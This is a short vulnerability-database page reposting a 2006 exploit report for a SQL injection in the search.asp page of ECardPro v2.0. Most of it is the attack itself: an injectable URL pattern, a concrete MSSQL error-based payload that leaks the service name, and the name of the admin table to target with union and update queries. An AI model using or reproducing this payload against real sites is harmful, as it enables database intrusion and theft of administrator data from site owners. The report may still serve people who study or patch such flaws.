Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14323
HistorySep 19, 2006 - 12:00 a.m.

ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

2006-09-1900:00:00
vulners.com
25

Vulnerability Report


Title : ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

Author : ajann

Script Page : http://www.keyvan1.com

Exploit;


Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"
etc(systemtables,union,update,select)…

ajann,Turkey

Im not Hacker!